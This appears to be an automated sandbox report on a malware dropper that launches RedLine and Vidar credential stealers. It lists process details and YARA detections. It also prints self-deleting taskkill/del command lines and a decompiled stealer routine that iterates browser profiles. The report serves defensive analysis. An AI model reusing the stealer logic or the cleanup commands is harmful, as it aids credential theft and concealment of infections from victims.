
Chronological Activities

Analysis Process: safert44.exePID: 8784, Parent PID: 5608

General

Target ID:	24
Start time:	18:23:56
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\safert44.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\safert44.exe"
Imagebase:	0xfa0000
File size:	251904 bytes
MD5 hash:	414FFD7094C0F50662FFA508CA43B7D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 00000018.00000000.386223308.0000000000FA2000.00000002.00000001.01000000.0000000B.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.746495285.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, Author: ditekSHen Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 80%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: jshainx.exePID: 8908, Parent PID: 5608

General

Target ID:	25
Start time:	18:23:58
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\jshainx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\jshainx.exe"
Imagebase:	0xa90000
File size:	109568 bytes
MD5 hash:	2647A5BE31A41A39BF2497125018DBCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000000.391784055.0000000000AA3000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 00000019.00000000.391784055.0000000000AA3000.00000002.00000001.01000000.0000000C.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.753380323.0000000003498000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: ditekSHen Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 46%, Metadefender, Browse Detection: 100%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: brokerius.exePID: 8968, Parent PID: 5608

General

Target ID:	26
Start time:	18:24:01
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\brokerius.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\brokerius.exe"
Imagebase:	0xb60000
File size:	290304 bytes
MD5 hash:	F5D13E361F8B9ACA7103CB46B441034B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.641024650.000000000111A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 0000001A.00000000.395822008.0000000000B94000.00000002.00000001.01000000.0000000D.sdmp, Author: unknown Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 0000001A.00000002.637138430.0000000000B94000.00000002.00000001.01000000.0000000D.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: captain09876.exePID: 9044, Parent PID: 5608

General

Target ID:	27
Start time:	18:24:03
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\captain09876.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Company\NewProduct\captain09876.exe"
Imagebase:	0x7ff614750000
File size:	721408 bytes
MD5 hash:	CE94CE7DE8279ECF9519B12F124543C3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 37%, Metadefender, Browse Detection: 38%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: ordo_sec666.exePID: 9092, Parent PID: 5608

General

Target ID:	28
Start time:	18:24:05
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe"
Imagebase:	0x400000
File size:	1810960 bytes
MD5 hash:	63FD052610279F9EB9F1FEE8E262F2A4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000003.455099291.00000000023BA000.00000040.00000800.00020000.00000000.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 45%, Metadefender, Browse Detection: 42%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: me.exePID: 9172, Parent PID: 5608

General

Target ID:	29
Start time:	18:24:07
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\me.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\me.exe"
Imagebase:	0xcf0000
File size:	289792 bytes
MD5 hash:	21C43007B3C14564CF459791F86DA430
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 0000001D.00000000.406600715.0000000000D23000.00000002.00000001.01000000.00000012.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.689715508.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 0000001D.00000002.693545020.0000000000D23000.00000002.00000001.01000000.00000012.sdmp, Author: unknown Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\me.exe, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 41%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1260, Parent PID: 8684

General

Target ID:	32
Start time:	18:24:30
Start date:	23/08/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c taskkill /im real.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\real.exe" & del C:\PrograData\*.dll & exit
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6656, Parent PID: 1260

General

Target ID:	33
Start time:	18:24:32
Start date:	23/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 1400, Parent PID: 1260

General

Target ID:	34
Start time:	18:24:33
Start date:	23/08/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im real.exe /f
Imagebase:	0xec0000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: timeout.exePID: 1172, Parent PID: 1260

General

Target ID:	36
Start time:	18:24:39
Start date:	23/08/2022
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 6
Imagebase:	0xcf0000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7692, Parent PID: 4584

General

Target ID:	37
Start time:	18:24:48
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6372 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7188, Parent PID: 4584

General

Target ID:	38
Start time:	18:25:00
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6468 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: SETUP_~1.EXEPID: 7912, Parent PID: 9044

General

Target ID:	39
Start time:	18:25:08
Start date:	23/08/2022
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
Imagebase:	0x5b0000
File size:	350301568 bytes
MD5 hash:	CE25658AC9291C713590B834D96406BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6364, Parent PID: 4584

General

Target ID:	40
Start time:	18:25:03
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6536 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6972, Parent PID: 4584

General

Target ID:	42
Start time:	18:25:09
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6528 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6724, Parent PID: 3452

General

Target ID:	43
Start time:	18:25:15
Start date:	23/08/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:	0x7ff75e520000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5900, Parent PID: 8968

General

Target ID:	45
Start time:	18:25:52
Start date:	23/08/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c taskkill /im brokerius.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\brokerius.exe" & del C:\PrograData\*.dll & exit
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7512, Parent PID: 5900

General

Target ID:	47
Start time:	18:25:53
Start date:	23/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 7816, Parent PID: 5900

General

Target ID:	48
Start time:	18:25:56
Start date:	23/08/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im brokerius.exe /f
Imagebase:	0xec0000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: timeout.exePID: 6944, Parent PID: 5900

General

Target ID:	49
Start time:	18:25:58
Start date:	23/08/2022
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 6
Imagebase:	0xcf0000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: F0geI.exePID: 8148, Parent PID: 5608COMMON

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	73.2%
Signature Coverage:	1.1%
Total number of Nodes:	619
Total number of Limit Nodes:	7

Executed Functions

Function 00401E18 Relevance: 81.3, APIs: 42, Strings: 4, Instructions: 812
memorystringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E00401E18(WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				signed int _v56;
				signed int _v60;
				void* _v64;
				signed int _v68;
				char _v72;
				intOrPtr _v76;
				void* _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v92;
				WCHAR* _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				void* _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				struct _WIN32_FIND_DATAW _v744;
				void* _t245;
				void* _t247;
				void* _t249;
				void* _t255;
				void* _t257;
				void* _t259;
				void* _t261;
				void* _t263;
				signed int _t265;
				void* _t267;
				void* _t271;
				signed int _t277;
				void* _t284;
				void* _t286;
				void* _t292;
				void* _t294;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				int _t321;
				WCHAR* _t322;
				int _t324;
				WCHAR* _t325;
				void* _t334;
				void* _t336;
				void* _t337;
				void* _t339;
				void* _t340;
				char _t341;
				void* _t342;
				void* _t361;
				void* _t363;
				intOrPtr _t366;
				intOrPtr _t367;
				void* _t368;
				void* _t370;
				intOrPtr _t373;
				intOrPtr _t374;
				void* _t375;
				void* _t377;
				intOrPtr _t380;
				intOrPtr _t381;
				void* _t382;
				void* _t384;
				intOrPtr _t387;
				intOrPtr _t388;
				int _t396;
				WCHAR* _t397;
				int _t398;
				int _t399;
				WCHAR* _t400;
				int _t401;
				signed int _t403;
				signed int _t405;
				void* _t409;
				void* _t411;
				void* _t412;
				void* _t414;
				void* _t415;
				char _t416;
				void* _t417;
				signed int _t427;
				void* _t431;
				void* _t433;
				intOrPtr _t436;
				signed int _t437;
				void* _t438;
				void* _t440;
				intOrPtr _t443;
				signed int _t444;
				void* _t445;
				void* _t447;
				intOrPtr _t450;
				signed int _t451;
				void* _t452;
				void* _t454;
				intOrPtr _t457;
				signed int _t458;
				void* _t461;
				void* _t476;
				signed int _t507;
				void* _t536;
				intOrPtr _t541;
				intOrPtr _t543;
				intOrPtr _t546;
				intOrPtr _t548;
				intOrPtr _t551;
				intOrPtr _t553;
				intOrPtr _t556;
				intOrPtr _t558;
				void* _t564;
				intOrPtr _t569;
				intOrPtr _t571;
				intOrPtr _t574;
				intOrPtr _t576;
				intOrPtr _t579;
				intOrPtr _t581;
				intOrPtr _t584;
				intOrPtr _t586;
				void* _t588;
				void* _t589;
				int _t591;
				void* _t595;
				void* _t598;
				void* _t617;
				signed int _t621;
				void* _t623;
				signed int _t634;
				void* _t636;
				void* _t644;
				void* _t648;
				void* _t651;

				_v100 = __edx;
				_t588 = 0x40;
				_v84 = 0;
				_v96 = __ecx;
				_t245 =  *((intOrPtr*)( *0x40e044))(_t588, 0x208);
				_t461 = _t245;
				_t247 =  *((intOrPtr*)( *0x40e044))(_t588, 0x208);
				_v44 = _t247;
				_t249 =  *((intOrPtr*)( *0x40e044))(_t588, 0x400);
				_v80 = _t249;
				_v28 =  *((intOrPtr*)( *0x40e044))(_t588, 0x100);
				if(_a12 != 0) {
					_t461 =  *((intOrPtr*)( *0x40e13c))(_t461, __ecx);
					_t255 =  *((intOrPtr*)( *0x40e018))(_t461,  &_v744);
					__eflags = _t255 - 0xffffffff;
					if(_t255 == 0xffffffff) {
						return 0;
					}
					_t257 =  *((intOrPtr*)( *0x40e044))(_t588, 0x400);
					_v16 = _t257;
					_t259 =  *((intOrPtr*)( *0x40e044))(_t588, 0x80);
					_v36 = _t259;
					_t261 =  *((intOrPtr*)( *0x40e044))(_t588, 0x200000);
					_v48 = _t261;
					_v32 = _t261;
					_t263 =  *((intOrPtr*)( *0x40e044))(_t588, 0x200000);
					_v52 = _t263;
					_t265 =  *((intOrPtr*)( *0x40e044))(_t588, 0x800000);
					_v40 = _t265;
					_v88 = _t265;
					_t267 =  *((intOrPtr*)( *0x40e044))(_t588, 0x400000);
					_v12 = _v12 & 0x00000000;
					_v56 = _v56 & 0x00000000;
					_v60 = _t267;
					_v24 = _t267;
					_v84 = 1;
					_t271 =  *((intOrPtr*)( *0x40e044))(_t588, 0x400);
					_v20 = _t271;
					_v64 =  *((intOrPtr*)( *0x40e044))(_t588, 0x1000);
					_t277 = E00401C87(__ecx, _v36,  &_v44,  &_v80,  &_v28, _a12);
					_t644 = _t644 + 0x10;
					__eflags = _t277;
					if(__eflags == 0) {
						L20:
						LocalFree(_v48);
						LocalFree(_v40);
						LocalFree(_v60);
						LocalFree(_v20);
						LocalFree(_v64);
						LocalFree(_v36);
						_t284 = _v16;
						__eflags = _t284;
						if(_t284 != 0) {
							LocalFree(_t284);
						}
						goto L22;
					} else {
						_t606 = _v80;
						_t631 = _v44;
						E004027B8( &_v32,  &_v16, __eflags, __ecx, _v44, _v80, _a4);
						E00402CB8( &_v88,  &_v16, __eflags,  &_v32, _v44, _v80, _a4);
						E00403760( &_v24, _t631, _a4);
						_t501 =  &_v52;
						E00403236( &_v52,  &_v16, __eflags,  &_v24, _t631, _t606, _a4);
						_t651 = _t644 + 0x38;
						_t396 = lstrlenW( *0x40e21c);
						_t397 = _v88;
						_v40 = _t397;
						_t398 = lstrlenW(_t397);
						__eflags = _t398 - _t396;
						if(_t398 >= _t396) {
							_t452 = E0040A503(_v40, _t461);
							_t584 =  *0x40e20c; // 0x5f5700
							_t454 = E0040A503(E0040A503(_t452, _t584), _v16);
							_t586 =  *0x40e20c; // 0x5f5700
							_t501 = E0040A503(E0040A503(_t454, _t586), _v28);
							_v12 = 1;
							_t457 =  *0x40e220; // 0x608860
							_v76 = _t457;
							_t458 =  *0x40e1e8; // 0x5f5860
							_v72 = _t501;
							_v68 = _t458;
							asm("movsd");
							_v40 = _t501;
							asm("movsd");
							asm("movsd");
						}
						_t399 = lstrlenW( *0x40e1a4);
						_t400 = _v32;
						_v48 = _t400;
						_t401 = lstrlenW(_t400);
						__eflags = _t401 - _t399;
						if(_t401 < _t399) {
							_t634 = _v12;
						} else {
							_t445 = E0040A503(_v48, _t461);
							_t579 =  *0x40e20c; // 0x5f5700
							_t447 = E0040A503(E0040A503(_t445, _t579), _v16);
							_t581 =  *0x40e20c; // 0x5f5700
							_t501 = E0040A503(E0040A503(_t447, _t581), _v28);
							_t450 =  *0x40e1d8; // 0x60f1c8
							_v76 = _t450;
							_t451 =  *0x40e1e8; // 0x5f5860
							_v72 = _t501;
							_v68 = _t451;
							_v48 = _t501;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t634 = _v12 + 1;
							_v12 = _t634;
						}
						_t588 = _v24;
						_v60 = _t588;
						_t403 =  *((intOrPtr*)( *0x40e08c))(_t588);
						__eflags = _t403;
						if(_t403 > 0) {
							_t438 = E0040A503(_t588, _t461);
							_t574 =  *0x40e20c; // 0x5f5700
							_t440 = E0040A503(E0040A503(_t438, _t574), _v16);
							_t576 =  *0x40e20c; // 0x5f5700
							_t501 = E0040A503(E0040A503(_t440, _t576), _v28);
							_t443 =  *0x40e22c; // 0x60eda0
							_v76 = _t443;
							_t444 =  *0x40e1e8; // 0x5f5860
							_v72 = _t501;
							_t588 = _v20 + _t634 * 0xc;
							_v68 = _t444;
							_v60 = _t501;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t634 = _v12 + 1;
							__eflags = _t634;
							_v12 = _t634;
						}
						_t405 =  *((intOrPtr*)( *0x40e08c))(_v52);
						__eflags = _t405;
						if(_t405 > 0) {
							_t431 = E0040A503(_v52, _t461);
							_t569 =  *0x40e20c; // 0x5f5700
							_t433 = E0040A503(E0040A503(_t431, _t569), _v16);
							_t571 =  *0x40e20c; // 0x5f5700
							_t501 = E0040A503(E0040A503(_t433, _t571), _v28);
							_t436 =  *0x40e214; // 0x60e718
							_v76 = _t436;
							_t437 =  *0x40e1e8; // 0x5f5860
							_v72 = _t435;
							_t588 = _v20 + _t634 * 0xc;
							_v68 = _t437;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t634 = _v12 + 1;
							__eflags = _t634;
							_v12 = _t634;
						}
						E00403C8F(_a8, _v64,  &_v56, _t501, _v44);
						_t644 = _t651 + 0xc;
						__eflags = _t634;
						if(_t634 != 0) {
							L16:
							_t409 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							_t411 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							_t564 = 0x10;
							_t412 = E0040A05F(_t409, _t564);
							_v24 = _t412;
							_t414 =  *((intOrPtr*)( *0x40e13c))(_t411,  *0x40e210);
							_t588 = _v24;
							_t415 = E0040A503(_t414, _t588);
							_v88 = _v88 & 0x00000000;
							_v32 = _t415;
							_t416 =  *0x40e204; // 0x5f5980
							_v92 = _t416;
							_t417 = E00408619( &_v32);
							_v24 = _t417;
							_t636 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
							_t507 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t588, 0xffffffff, 0, 0, 0, 0);
							__eflags = _t507;
							if(_t507 != 0) {
								_t427 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t588, 0xffffffff, _t636, _t507, 0, 0);
								__eflags = _t427;
								if(_t427 != 0) {
									E00407EDB(_v100, _t636, _v12, _v20, _v56, _v64, _v24,  &_v92);
									_t644 = _t644 + 0x18;
								}
							}
							LocalFree(_t636);
							LocalFree(_v24);
							LocalFree(_v32);
							LocalFree(_t588);
							goto L20;
						} else {
							__eflags = _v56 - _t634;
							if(_v56 <= _t634) {
								goto L20;
							}
							goto L16;
						}
					}
				} else {
					PathCombineW(_t461, __ecx, L"Default");
					L22:
					_t589 = _t588 | 0xffffffff;
					_v48 = _t589;
					do {
						_t286 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
						_v16 = _t286;
						_t617 =  *((intOrPtr*)( *0x40e044))(0x40, 0x80);
						_v88 = _t617;
						if(_t589 != 0xffffffff) {
							wsprintfW(_t617, L"Profile %d", _t589);
							_t644 = _t644 + 0xc;
						} else {
							_t617 =  *((intOrPtr*)( *0x40e13c))(_t617, L"Default");
							_v88 = _t617;
						}
						PathCombineW(_t461, _v96, _t617);
						_t292 = FindFirstFileW(_t461,  &_v744); // executed
						_t655 = _t292 - 0xffffffff;
						if(_t292 != 0xffffffff) {
							_t591 = 0x40;
							_t302 = LocalAlloc(_t591, ??); // executed
							_v24 = _t302;
							_t304 = LocalAlloc(_t591, 0x200000); // executed
							_v64 = _t304;
							_t306 = LocalAlloc(_t591, 0x800000); // executed
							_v36 = _t306;
							_t308 = LocalAlloc(_t591, 0x400000); // executed
							_v84 = _v84 + 1;
							_v12 = _v12 & 0x00000000;
							_v60 = _v60 & 0x00000000;
							_v32 = _t308;
							_t310 =  *((intOrPtr*)( *0x40e044))(_t591, 0x400, 0x200000);
							_v20 = _t310;
							_t312 =  *((intOrPtr*)( *0x40e044))(_t591, 0x1000);
							_v40 = _t312;
							E00401C87(_v96, _t617,  &_v44,  &_v80,  &_v28, _a12); // executed
							_t592 = _v80;
							_t618 = _v44;
							E004027B8( &_v24,  &_v16, _t655, _v96, _v44, _v80, _a4); // executed
							E00402CB8( &_v36,  &_v16, _t655,  &_v24, _v44, _v80, _a4); // executed
							E00403760( &_v32, _t618, _a4); // executed
							_t470 =  &_v64;
							E00403236( &_v64,  &_v16, _t655,  &_v32, _t618, _t592, _a4); // executed
							_t648 = _t644 + 0x48;
							_t321 = lstrlenW( *0x40e21c);
							_t322 = _v36;
							_v52 = _t322;
							if(lstrlenW(_t322) >= _t321) {
								_t382 = E0040A503(_v52, _t461);
								_t556 =  *0x40e20c; // 0x5f5700
								_t384 = E0040A503(E0040A503(_t382, _t556), _v16);
								_t558 =  *0x40e20c; // 0x5f5700
								_t470 = E0040A503(E0040A503(_t384, _t558), _v28);
								_v12 = 1;
								_t387 =  *0x40e220; // 0x608860
								_v112 = _t387;
								_t388 =  *0x40e1e8; // 0x5f5860
								_v108 = _t470;
								_v104 = _t388;
								asm("movsd");
								_v52 = _t470;
								asm("movsd");
								asm("movsd");
							}
							_t324 = lstrlenW( *0x40e1a4);
							_t325 = _v24;
							_v56 = _t325;
							if(lstrlenW(_t325) < _t324) {
								_t621 = _v12;
							} else {
								_t375 = E0040A503(_v56, _t461);
								_t551 =  *0x40e20c; // 0x5f5700
								_t377 = E0040A503(E0040A503(_t375, _t551), _v16);
								_t553 =  *0x40e20c; // 0x5f5700
								_t470 = E0040A503(E0040A503(_t377, _t553), _v28);
								_t380 =  *0x40e1d8; // 0x60f1c8
								_v124 = _t380;
								_t381 =  *0x40e1e8; // 0x5f5860
								_v120 = _t470;
								_v116 = _t381;
								_v56 = _t470;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t621 = _v12 + 1;
								_v12 = _t621;
							}
							_t595 = _v32;
							_push(_t595);
							_v32 = _t595;
							if( *((intOrPtr*)( *0x40e08c))() > 0) {
								_t368 = E0040A503(_t595, _t461);
								_t546 =  *0x40e20c; // 0x5f5700
								_t370 = E0040A503(E0040A503(_t368, _t546), _v16);
								_t548 =  *0x40e20c; // 0x5f5700
